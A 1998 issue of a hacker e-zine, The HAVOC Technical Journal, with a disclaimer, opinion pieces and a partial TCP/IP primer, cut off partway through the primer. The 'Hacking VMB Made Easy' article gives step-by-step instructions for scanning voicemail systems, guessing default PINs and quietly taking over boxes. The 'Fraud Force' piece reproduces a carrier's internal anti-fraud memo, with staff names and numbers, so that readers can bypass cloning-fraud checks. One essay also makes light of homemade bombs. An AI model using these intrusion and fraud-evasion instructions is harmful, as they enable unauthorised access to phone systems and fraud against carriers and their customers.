. . . . . ,g$p, .,. $&y .,. `"` oooy$$$yoo o oooy$$$yoo o . `$$$'$$$yyyyp,`$$$' gyp . . . yxxxx $$$ $$$"`"$$$ $$$ $$$ xxxxxxxxxxxxxxy . volume 2 $ $$$ $$7 ly$ $$$ $$$ $ number 6 $ $y$ $$b d$$ $y$ $y$ $ issue 18 . $xxxx $$$ $$$ $$$ $$$ $$$ xxxxxxxxxxxxxx$ . . """ """ """ """ $$' . t h e h a v o c $$' t e c h n i c a l j o u r n a l [January 1, 1998..................$'...........................Happy New Year] [......................'Putting the hell back in shell'......................] [Table of Contents...........................................................] Contacts & Copyrights......................................Staff Editorial..................................................scud_ The Way It Should Be.......................................shoelace Bringing Back the Old School...............................Revelation Hacking VMB Made Easy......................................SSS Fraud Force System.........................................D-Day An Introduction to the Internet Protocols..................scud_ Windows NT Vulnerability Theories Version 2................vacuum Basic Network Architecture, Part II........................lurk3r blast.c....................................................memor sendmail885.c..............................................su1d sendmail885.c (2)..........................................scud_ Scripting in UNIX..........................................Nartrof ttyread.c and ttywrite.c...................................simon The Mailroom...............................................scud_ The News...................................................KungFuFox Reader Survey..............................................Staff ---->NEW Majordomo<---- Subscribe to thtj at: majordomo@orc.ca 'subscribe thtj you@your.isp' [Contacts & Copyrights..................................................Staff] [1. Contacts] Editor in Chief : Scud-O, Executive Editor : KungFuFox, Submissions Editor : Keystroke, Editing Assistants : FH, Phrax, News Editor : KungFuFox, Mail Editor : Scud-O, Webpage Editor : Scud-O, Extra Special Thanks : All the writers, and people who filled out the reader survey. Shout Outs : All of you in the know. THTJ Website : http://www.thtj.com/ THTJ e-mail : thtj@thtj.com, scud@thtj.com [2. Copyrights] The HAVOC Technical Journal (THTJ) Volume 2, Number 6, Issue 18 January 1st, 1998. *Everything* here is (c) Copyright 1996,1997,1998 by THTJ, HAVOC Bell Systems Publishing, or HNS. All Rights Reserved. Nothing may be reproduced in whole or in part without written permission from the Editor in Chief. The articles included here, belong to their writers and articles are copyrighted by their writers. If you want to use their articles in your publication, ask them. For more information on our copyrights, and article submissions policy, please see http://www.thtj.com/submissions.html For more information on legal stuff goto http://www.thtj.com/legal.html [No copying THTJ, damnit.] Articles, comments, whatever should be directed to: scud@thtj.com Subscribe to thtj at: majordomo@orc.ca 'subscribe thtj you@your.isp' Disclaimer: THTJ is provided free of charge, thus THTJ provides NO warranties whatsoever. You use this zine and its information at your own risk. While every effort has been taken to ensure the accuracy of the information contained in this article, the authors, editors, and contributors of this zine assume no responsibility for errors or omissions, or for damages resulting from the use of the information contained herein. The HAVOC Technical Journal does in no way endorse the illicit use of computers, computer networks, and telecommunications networks, nor is it to be held liable for any adverse results of pursuing such activities. [Actually, to tell you the honest to goodness truth, we do endorse that stuff. We just don't wanna get in trouble if you try it for yourself and something goes wrong.] -------------------> 'Its Not Our Fault' <------------------- THTJ is protected by the First Amendment of the US of A. If any of the information contained in this file offends you, then why the hell are you reading it? THTJ publishes its information to educate you, if YOU choose to use the information illegally, so be it. We are not responsible for *YOUR* actions. We merely provide the information. By reading this zine, you agree to this policy, and you void all rights to sue us or get us involved in the consequences of *YOUR* actions. If you can not deal with this policy, then delete this file now. Stealing articles, or pieces of articles, or pieces of pieces of articles from thtj with out permission is a crime against humanity. If you want to use any of the material in here, please contact THTJ and/or the articles author. If you do not follow these rules, we may be forced to take legal action. NOTICE: if you are a government offical or employee reading this file, you MUST register with thtj. A registration permit will be mailed to you free of charge by using either of the mail addresses above. A Registration fee of $50 is required upon submission of the permit. This will entitle you to recieve thtj via a private mailing list, or via snail mail on a 3.5 floppy disk. UNTIL you are officially registered, you MUST DELETE ALL COPIES of thtj that you have, either in print or on a computer. You CAN NOT read thtj until you are registered. This is *NOT* optional. If we detect .gov access from an unregistered person, we will have to take legal action. [Editorial..............................................................scud_] Ladies and gentlemen, boys and girls, feast your eyes on the new look of thtj. This will probably be the look for use for the new few issues, unless you mail us and say that you are going to kill us all because we aren't good at ASCII. We are still going to be playing around with this format a bit, so your comments can help. I would like to take some time out and address all of the reader surveys I have recieved. To the hundreds of you that replied, I thank you for your input, and I hope that the rest of you out there follow the lead of these people and fill out the survey. Those of you that did fill it out last month, feel free to fill out the form again and tell us how we are progressing. A few of you that replied were sysadmins, and most of you said that you wish that hackers understood that most of these sysadmins are hackers just like you and me. This is an important point. Many sysadmins out there are a hundred times better at hacking than alot of the hackers out there. Some sysadmins are not really hackers and they hate hackers, thus messing up the rep for all sysadmins. Alot of you also asked if I was interested in articles. The answer is YES! thtj lives off of the articles that you all submit to us. If it wasn't for all of you out there that submit articles, thtj would have dried up a long time ago. So, please help keep this zine going by submit articles to it. If you would like to submit an article, please send it to me at scud@thtj.com. I will look the article over, and will try to get back to you, but if I don't, then the article eihter will or will not be in the next issue of thtj. Well, I must get back to the Festivus and the feats of strength, so I will not be able to write a real important editorial this month, but go on and read shoelace's bickerings below. [The Way It Should Be, Dammit........................................shoelace] Alas, yet another lame article but shoefunk (yes, that is also Shoelace). This one is about how stupid the world really is when it comes to computer's, hacking, phreaking, bomb making, well, just about anything. Recently, I was reading the 'Time Digital: Your Guide To Personal Technology", and came across a small dictionary page, where they defined a hacker as.. "HACKER: A good guy gone bad. In the early days of computing, the term was applied to enthusiastic, Jolt cola-swilling programmers who lacked formal training. Increasingly, though, hacker refers to a kind of high-tech, disgruntled postal employee--one who breaks into and crashes corporate and government databases for the sheer hell of it--and for a little recongnition too." Although this is in some cases true, I see more cases of people doing it to prove a point. Rather it's to prove that they can do something, or to let their oppinion out about something, the common 'hacker' will do the 'hack' for probably more than just the sheer hell of it. You should always try to prove a point with what you do, even if the point isn't gonna happen. It get's out faster, and more people will find out about it. Next subject; phreaking. I don't know about you people out there, but why is it that if you can set up a teleconferance, that you are elite? I don't get it.. just because you can go down to a local pay-phone and dial up ATT Voice Conferancing, post the information, and talk to people, that you are really, really, really super. I'm not saying that a conf. isn't nice now and then, and that when someone set's it up, that you don't thank them, but why worship them? It's just a conf. Why not take apart your phone and see why it works instead of bribing someone that if they set one up, they will be rewarded? It's much more gratifing to go and see why something work's, rather than to charge major cost to someone else. So go unscrew your phone and pry it open. Also, what do people think making a pyrodex bomb is gonna do? Just because you have a lbs. of pyrodex in your room, doesn't mean your gonna blow up another Oklahoma Municiple Building type explosion. People should stop worrying about having fireworks and homemade explosions. My friend's and I make lot's of bombs, and have yet blown up buildings or anything. It's just something to do. So enough of all the bitching about Hacking/Phreaking/Bomb's.. just let whatever's gonna happen, happen. Let bomb's go boom, PLEASE let phreaking become about understanding phone's and why things happen, and for hacking, prove a point about why you do something. And for shoelace, shut up already. -shoelace (shoe@beer.com) (http://www.public.usit.net/sltaylor) -IRC: undernet - #terrorism, #deathmetal, #phreak [Bringing Back the Old School......................................Revelation] 0000000000000000000000000000000000000|| 0 0|| 0 BRINGING BACK THE OLD SCHOOL II 0|| 0 By 0|| 0 Revelation 0|| 0 Hackers.Com 0|| 0 0|| 0000000000000000000000000000000000000|| ||||||||||||||||||||||||||||||||||||| Many of you may have read my article "Bringing Back The Old School" in THTJ #12. It got a huge response and so I decided to write a followup on it, with more of my views and ideas on what the underground is becoming and what it should be. If you haven't read my previous article, I strongly suggest you do as a prelude to this. The Internet was created to be a free place. A place where people can learn about anything and everything. Yet another tool that will change society for the better. But, there are always rebels. Rebels do as they please and refuse to abide by given rules that confine their hunger for knowledge. The Internet rebels gathered in a non-physical arena known as the underground. The underground is composed of hackers and phreaks and anyone with an interest in technology and the determination to learn as much as possible, regardless of the obstacles. What is life about anyway? In my opinion, it's about learning. What else is there? There are material things that occupy most of our time, but what's it all for? Nothing. The only real thing is knowledge. Someone with the determination to learn all they can regardless of the obstructions is a great asset to society in general. These are the people who create things that make life easier to live. These are the people who theorize and ponder about all that exist, simply because they want to. Knowledge is not a tangible thing, thus it cannot be taken away. There are many mediums used for the study and passing of knowledge, the computer is just one of them. Some people choose books, others television or radio, we choose the computer. Hackers have gotten a distorted image for various reasons which I'm not going to go into, because what's done is done. Hackers originated as highly skilled computer programmers, and that eventually got distorted into computer criminals. Now, we are neither. What we are is information seekers. We just want to learn about all we can, because that's all that really matters in the long run. We want to learn about not only computers, but telephones, technology, government, the world in general, and life. We choose to pursue this knowledge by any means necessary, and on occasion, that may violate a law or two, but we hurt no one, we harm nothing. We are not criminals. As soon as the public understands that we will finally be taken for what we are: people wanting to learn. Knowledge is taken for granted these days. The underground has lost its sense of ethics, the ethics of knowledge seeking and non-destruction that I described above. The underground has become polluted with software pirates, email bombers, carders, virus spreaders, and anarchists. We must pull away from those things that corrupt the underground now, or they will eventually corrupt us few who still believe in the true underground. These unethical, immoral, and just plain stupid things must be stopped. And stopping them is easy, but getting everyone to cooperate is not. We can stop these things by simply refusing to distribute the files that teach these things, because if you stop the flow of the unethical information, people will turn to the ethical because it's all that's left. Simply refusing to link to sites that distribute these files will help too. So that's all you have to do to help me and Hackers.Com realize our idea of the New School, a return of the Old School ethics, simply deny the information that is corrupting the underground. Now, some of you may be thinking: "He stated that all information should be free and that all hackers want is to pursue information, but then he stated that we need to stop the flow of information. This doesn't make sense." Well, actually, it does. I understand what you're thinking, but you must try to understand what I'm thinking. We choose to pursue pure knowledge for the simple gain of more knowledge, nothing else. We get no material gain from our desire to learn. But, those who pirate software, card, etc. are gaining finances and causing destruction at the same time. I want to stop the flow of information that does nothing but damage, because this is not the information which we want to pursue. We want to pursue the information that creates knowledge, not destroys or corrupts it. It is easier to destroy than to create, but creating is much more rewarding. So this is it...this is a major step towards realizing our dream of freedom, greatness, and ethics among the underground population. Our determination to get rid of software pirates, carders, virus spreaders, and anarchists who do nothing but destroy, will overcome them...it's just a matter of time. I hope that the things I have discussed in this and my previous article are of some help to you in the underground and in life. Please study the things I have written, and think about them, and help me achieve the goal that I share with every other true hacker out there...bringing back the old school. If you wish to further discuss these topics with me, or just comment on my article, you can do so by emailing me at: revelation@hackers.com Or if you'd like more information on my ideas and my quest to bring back the Old School, you may visit my web site at: www.hackers.com There you will find informational resources for the true hacker, and it will change your life forever. I will never give up...I hope the same is true for you. Written By: Revelation Hackers.Com revelation@hackers.com "Bringing Back The Old School" [Hacking VMB Made Easy ...................................Super Sharp Shooter] (mdma@cyberus.ca) (12/21/97) Voice Mail Boxes (VMB) I would say is the best way to keep in touch, give info, or just say hi to someone other then email. But the fun thing with VMB's is that most of them are 1-800's and you can call them up or check them from any payphone (for free!) or ANY where in the world. How do VMB's work? VMB's are basily computer systems, with passwords, menus, users, with permissions, and so on. But it is all done by voice and DTMF tones. Just like computer systems, there are many different VMB systems out there, some stronger then others, some not. Think of a answering machine, but all digital and hundreds of them on a box. First step is finding a VMB system, there are hundreds of 1-800 VMB out there waiting to be hacked. Pick up a phone (a speaker phone works the best) and start hand-scanning, 1800-111-0001, 0002, 0003, and so on. You should only hand-scan after bussiness hours. The best ones are small bussiness, when you get to one (after hours) you should hear something like "Hello welcome if you know your parties ID box number (or pid or ext.) you may dial it now." BINGO, you got one. Try out all the menu's and get a feel for the system. Ok I found a VMB system now what? First you have to get to the VMB system (after all this is a computer not only running VMB's), most of the time its '#' or '*' as soon as you hear the MAIN welcome message of the company. Next you have to know how long the box numbers, you can find this out by going to the main menu and you should hear something like, "If you want you hear the directury of people (users) press #" hit # and listen to the listenings. Example "John Doe box 546....Jonny Down box 538" and so on. Most systems have 3 digits long boxes, and the super-user usally places the users in groups like 2XX for marketing section, 6XX for accounting and so on, so listen and write down all the groups when listening to the directiry list. If you hear that the 2xx's group are active listen to the last box number in the group and right it down. Most of the time sysadmins add extra boxes so they cam add users to the group. The extra ones will be your target, why? Well its easyer to hack into, and when you get one it will take a lot longer for the sysadmins to find out that you hacked a box on the system. The main goal is too find an EMPTY box, after you found an empty box, the next step is the longest and you need luck. All VMB systems have default settings, for example when you set up a box (as the sysadmin) the passwd could be the same as the box number, ie: box 123, passwd 123. First you have to find length of the passwd, you can do this by putting in the box number first then it will ask you for the passwd (or pin number) first press the 1 button (doesnt have to be the one button) then wait a few secs, then 2..wait....then 3...wait keep doing until the lady says "Wrong Pin Number, please try again!" Just make sure you do it slow. Now that you know the passwd length here are some common defaults you should try first: 1) same box passwd -=- box is 902 try 902 for passwd 2) reverse passwd -=- box is 902 try 209 for passwd 3) add 1,2,3+ passwd -=- box is 902 try 9021 for passwd, 9022, 9023, etc. 4) Year passwd -=- 1997, or 1998 whatever year we are in More: _4 digit passwd_ _5 Digit Passwd_ _6 Digit Passwd_ 0000 00000 000000 1111 11111 111111 2222 22222 222222 3333 33333 333333 4444 44444 444444 5555 55555 555555 6666 66666 666666 7777 77777 777777 8888 88888 888888 9999 99999 999999 And the list goes on and on.....just use your head. Try shit like 1234, 4321, and just look at your telephone keypad and look for patterns. Just dont give up. I GOT ONE!! Now what? Once you get into a box you will hear a number of menus, the first thing you should do is check to see if there are any new or saved messages on the box, if so listen to them and pay attention to the date of the message. If you have found an empty box you dont have to worry about this, but if you hacked into someone's box this is important. If the dates on the messages are old (ie: 1+ months) then there is a good chance that your new box will not get killed, but if the messages are a few days (or hours) old then dont fuck with anything and try to hack a new box. If you screw with that box like delete messages, change passwd on the box, the owner will tell the sysadmin and you will lose it anyways, and then the sysadmin how hackers are trying to break into the system. Once you feel that the box you have is safe, its up to you what to do. Change the voice greeting message, passwd, some VMB systems have wake up calls, which is wicked, think about it, you can put ANYONE's phone number in and time (ie: 4:00am) in North America to wake them up, or piss them off. Just look around on each menu so get a feel for it. Most of the time sysadmins are box number 999, 998. So if your lucky and can hack a sysdmin box you can make new groups, new boxes for all your friends. If you do hack the sysadmin box just make a few boxes and leave, dont change the sysadmin's passwd or delete any messages. Play Safe, and Have Phun. Super Sharp Shooter -+- 1.800.234.1136 BOX 999 "Phreaking For Phun" http://www.cyberus.ca/~mdma/phreak NPA 613 [Fraud Force System.....................................................D-Day] Century Cellunets New "Fraud Force System" Technical Interoffice Data People in the Baton Rouge,New Orleans Lousiana and surrounding towns may find some use in the following file. It douments the structure of the "Fraud Force" System being implemented into these locations cell sites and switches. It is unknown if it will affect landline systems,but from the way it works,it is doubtful. EOC---------------------------------------------------------------------EOC Interoffice Memorandum Date:Febuary 18,1997 File:FRAUDFOR To:Div/Dist Managers Office Managers Chris Nolen Barry Gugliuzza FROM: Phyllis May SUBJECT: Fraud Force Use In Fraud Markets Laura Graham developed the following procedure for the Customer Service Center to be used when customers are using the phones in high fraud markets where Fraud Force has been implemented. The following details are unique to Region 1 and the Force implementation. Fraud Force will start with the Baton Rouge system the week ending Feb 28. Other markets will be added as needed. All Louisiana,Arkansas and Texarkana cellulars in this sytem will be routed through Fraud Force. Calls will be routed to Customer Service. Please direct any questions to Jim Burnham at 318/683-3429 or Rhonda Woodard at 318/683-3427. (page 2) Overview: Purpose: FraudForce is a system implemented by Century,to help combat cloning fraud for our customers roaming in high fraud areas. Affected markets will be included as needed,those which are found to have high fraud rates. (page 3) Following is an overview of the verification process for Century customers using cell service for the first time in a FF market. For detailed instructions,see "Verification Process" Step| Action 1.Customer places first call to any number. 2.Call is routed (hotlined) to FraudForce,where an Interactive Voice Response (IVR) prompts the user to enter their 10 digit cell number,which is verified ending with the pound key. The customer has three (3) tries to enter their number correctly. 3.Call is transferred to Century Cellunet's customer service center. -Valid customers will contimue to step 4 -Invalid customers are instructed to make another call and re-enter the correct cell number. 4.The customer information is verified to confirm the cell user is valid. - ------------------------ ----------------------------------------- |If Information Is | The CSR | ---------------------------------------------------------------------- | verified, | explains the call credit and | | | procedure to establish PIN. Go to step 5| |-------------------------- ------------------------------------------ | not verified, | presses 0 on their keypad to transfer to| | | a recording explaining the caller is | | | denied. | |__________________________|_________________________________________| 5.The CSR presses 1 to transfer the call to the FraudForce IVR,and the customer interactively uses their phone keypad to establish a 4 digit PIN. 6.If a billed call,the CSR notes the length of the call and credits the customers account(length of call X roaming airtime rate) to AFDFC. This is because the customer incurred airtime charges during verification and PIN selection. (page 3) ESTABLISHING AND USING A PIN Hours accesible: Any normal working hours. Customers after hours will be directed to call during normal hours. Call types: There are two types of FraudForce calls. Fraud Force 1 These are calls where the customer entered a valid 10 ------------- digit cell number when prompted after the inital hotline. There are customers who had previously established a PIN, however entered it incorrectly and must repeat the verification process,or are making their first call in the FraudForce market verifying for the first time. Fraud Force 3 These are calls where the customer entered an invalid 10 ------------- digit cell number or pressed zero (0) for assistance.(the customer has three tries to enter their cell # correctly.) The customer can not be verified without entering a valid 10 digit number. They are instructed to attempt the call again,so they recieve the IVR prompts to enter the 10 digit number correctly. PIN DETAILS: The PIN is four digits and should not start with zero. The PIN is not accesable to Century. The customer must remember their PIN. Once established,the PIN is valid in that market until Century removed it and the customer calls the IVR to establish a new one. This can be done if the user forgets their PIN or if the usage/user appears to be fraudulent and Century needs to block service. A PIN must be established in each FraudForce market. The same PIN may be used in every FraudForce market,or different PINs may be used. Different customers MAY have the same PIN. The customer will periodically be asked to enter the PIN before making a call. A user has 3 tried to enter the PIN correctly. On the 4th try,the call will be directed to Fraud Force 1. (page 4) VERIFICATION PROCEDURES The following are the procedures for a FraudForce 1 call. 1.Customer first places call to any number. 2.Caller is hotlined to FraudForce,where an IVR prompts the user to enter their 10 digit cell phone number and the pound key. 3.When entered correctly,the call is transferred to Century's customer service center,with the following introduction "Please verify your 10 digit cellular number. Press any key to accept this call." 4.The CSR presses any key on their phone to accept the call and says to the caller,Century Cellunet,This is (name) You are currently roaming in a high cellular fraud area. For your protection and ours,will you verify some account information to enable you to establish a Personal Identification Number,or PIN. 5.Important:Customer information must be verified to confirm the account holder,secondary authorization holders,or buisiness account cellular users are valid before given access to establising a PIN. Individal Accounts: What city are you currently in? What is your mobile number? What is your name? If user differs from account name,What is the name on the account? What is your Social Security Number? If the Social Security number is not verified,verify one of the following: What is the account's billing address? What is your home phone number? What is your work number? Business Accounts: What city are you currently in? What is your mobile number? What is your name? What is the account name? What is the accounts billing address? The general billing address is okay,if not verified at all (customer does not know)verify the following: What is your work phone number? (page 5) If information is verified: Thank you for your cooperation. If a billed call-You will recieve credit for this call. If a free call-This is a free call. I am now returning you to the system so you can set up your PIN. The CSR presses 1 on their keypad to transfer to the FraudForce IVR to establish their PIN. If Information is NOT verifed: I am unable to authorize the information you have given;and presses 0 on their keypad to transfer the call to a recording explaining the call is denied. (no dont give out account information) 7. The CSR tickles the cutomers account using an action code of PENDF. Include the 1- digit cellular number,FF,whether or not the customer was verified. (page 6)(End of Memo) I would have typed the rest of this file,but its just basically a list of customers questions and alternate places for the caller to be transferred. Nothing you pretty much need to know about the system,but if you keep a copy of this on hand,you may be able to bypass. You have what the operator is looking at,you know what shes going to do. Use this information,dont flaunt it. Century is a good corporation,but sometimes you need a cell! Remember, if updates to this file are made,I will be sure to send them out to the public. UPDATE: I have just discovered that FraudForce is now being implemented in almost all cities around the country that use Century. Now this is a serious problem. [An Introduction to the Internet Protocolos.............................scud_] It seems that everyone is covering this topic for an article, so I figured that it was high time that I toss my hat into the ring and muck things up a bit more. This is merely and introduction, so I am not going to go into the formats for TCP and UDP headers and packets, well at least not in this version of this document. TCP/IP and all of the other Internet protocols take up whole books (and volumes of books) to fully explain. If you want to learn more, check out the local B&N or Borders, and pick up a book on TCP/IP. [ Editor's Note: The deadline for this issue came up too fast, so I was unable to finish this whole text. There is still a good into to TCP and UDP, so read it, and next month I will hopefully complete this Introduction with the rest of the gang of Internet Protocols.] The Internet is the world's busiest and the only true worldwide network for all types of computers and people to use. What follows is an Introduction to the protocols that make the Internet work. There are a wide range of protocols that the Internet uses to connect to other computers all over the world. However, since the Internet was started on UNIX, the UNIX standards of networking are what the Internet mainly uses to connect computers together. The UNIX protocols are often referred to as TCP/IP for Transmission Control Protocol/Internet Protocol. This is really in two parts, the TCP is an upper layer for data transport, and the IP is a lower level network layer, but more on this in a bit. Although several other methods are used for other services, TCP/IP is the most commonly used protocol grouping, so we will cover TCP/IP first. Before we delve into TCP/IP, we must first understand the model that the Internet's protocols are developed on. Welcome to OSI. -ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ OSI - The Open Systems Interconnect Reference Model -ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ The Open Systems Interconnect (OSI) Reference Model was part of a project by the International Organization for Standardization (ISO). The ISO OSI network protocol architecture scheme never really caught on, but the TCP/IP protocol uses the basic groundwork that OSI started. The model consists of 7 layers, with each layer building on the layers below it, and providing specific functionality. Each layer has its own unique characteristics, and as a whole, the OSI model enables network communication. The software implentation of such a layered model is appropriately termed as a protocol stack. User applications insert information into one layer and each layer specially encapsulates the data until the bottom layer has been reached, and this physical layer moves the data down the line to its destination, occasionally having the layers translated from the bottom up as the data is transported. The OSI Model looks like below: ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ 7. Application Layer ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ 6. Presentation Layer ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ 5. Session Layer ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ 4. Transport Layer ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ 3. Network Layer ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ 2. Data Link Layer ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ 1. Physical Layer ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ The layers have specific roles as I have said, each refraining from intruding into the domains of the other layers. The Units exchanged are the units of information that is passed in that layer. o Application Layer: Contains the network applications with which people interact, such as mail, ftp, rlogin, etc. Units exchanged: message o Presentation Layer: Creates common data structures. Units exchanged: message o Session Layer: Manages connections between network applications. Units exchanged: message o Transport Layer: Ensures that data is recieved exactly as it was sent. Units exchanged: message o Network Layer: Routes data through various physical networks while traveling to a known host. Units exchanged: packets o Data Link Layer: Transmits and receives packets of information reliably across a uniform physical network. Units exchanged: frames o Physical Layer: Defines the physical properties of the network, such as voltage levels, cable types, interface pins and other such fun things. Units exchanged: bits -ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ The TCP/IP Network Model -ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ The OSI model informs an understanding of the TCP/IP communication architecture. When TCP/IP is viewed as a layered model, there are usually 4 layers that are seen to compose TCP/IP: o Application o Transport o Network o Link As with OSI, each TCP/IP layer has its own unique job: Applications Layer: Network applications depend on the definition of a clear dialog. In a client-server system, the client application knows how to request something, and the server knows how to respond to that request. Examples of this include FTP, HTTP, etc. Transport Layer: The transport layer allows network applications to obtain messages over clearly defined channels and with specific characteristics. The two protocols within the TCP/IP suite that generally implement this layer are TCP (Transmission Control Protocol) and UDP (User Datagram Protocol). Network Layer: The network layer allows information to be transmitted to any machine on the contigous TCP/IP network, regardless of the different physical networks that intervene. The Internet Protocol (IP) is the common mechanism for transmitting data within this layer. Link Layer: The link layer consists of the low level protocols used to transmit data to machines on the same physical network. Protocols that are not part of the TCP/IP suite, such as Ethernet, Token Ring, FDDI, ATM, etc. implement this layer. A 2 system TCP/IP connection would look something like below: System 1 (client) System 2 (server) ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Application ³ ³ Application ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Transport ³ ³ Transport ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Network ³ ³ Network ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ Physical ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Data Link ³<------------------------------------------>³ Data Link ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Network ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Data within these layers is usually encapsulated with a common mechanism; protocols have a header, identifying meta-information such as the source, the destination, and other important attributes, and a data portion that contains the actual information. The protocols from the upper layers are encapsulated within the data portion of the lower ones. When traveling back up the protocol stack, the information is reconstructed as it is delivered to each layer. ÚÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄ¿ Application Layer: ³ Header ³ Data ³ ÀÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÙ ÚÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄ¿ Transport Layer: ³ Header ³ | Data ³ ÀÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÙ ÚÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ Network Layer: ³ Header ³ | Data ³ ÀÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÚÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ Link Layer: ³ Header ³ | Data ³ ÀÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ For example, a 200 byte TFTP packet using UDP/IP over Ethernet might look a little something like: ÚÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄ¿ ³ Ethernet ³ IP ³ UDP ³ TFTP ³ Data ³ Ethernet ³ ³ Header ³ Header ³ Header ³ Header ³ ³ Trailer ³ ÀÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÙ (bytes) 20 14 8 4 200 4 This adds up to a total Ethernet frame size of 250 bytes. -ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ The TCP/IP Protcols: The Internet Protocol (IP) -ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ IP is the cornerstone of the TCP/IP suite. Every piece of data on the Internet travels through IP packets, the basic unit of IP transmissions. IP is termed a connectionless, unreliable protocol, since IP does not exchange control information before transmitting data to a remote system, the packets are merely sent to the destination with the expection that they will be treated properly. IP is unreliable because it does not retransmit lost packets or detect corrupted data. IP depends upon the upper level protocols such as TCP or UDP to do this. IP defines a universal addressing scheme called IP addresses. An IP address is a 32-bit number, and each standard address is unique on the Internet. Given an IP packet, the information can be routed to the destination based upon the IP address defined in the packet header. IP addresses are generally written as four numbers, between 0 and 255, separated by a period (i.e. 168.143.27.120) While the 32 bit number is an appropriate way to address systems for computers, humans understandably have difficulty remembering them. Thus, the Domain Name System (DNS) was developed to map IP addresses to their corresponding domain names, and vice versa. Thus mulder.clark.net is the same thing as 168.143.27.120, and 168.143.27.120 is the same thing as mulder.clark.net . It is very important to realize that these domain names are not used or understood by IP at all. When an application wants to transmit data to another machine, it must first translate the domain name to an IP address using DNS. The receiving application must then use DNS to return a domain name into its IP address. There is not a one to one correspondence between IP addresses and domain names, a domain name can map to multiple IP addresses and multiple IP addresses can map to the same domain name. 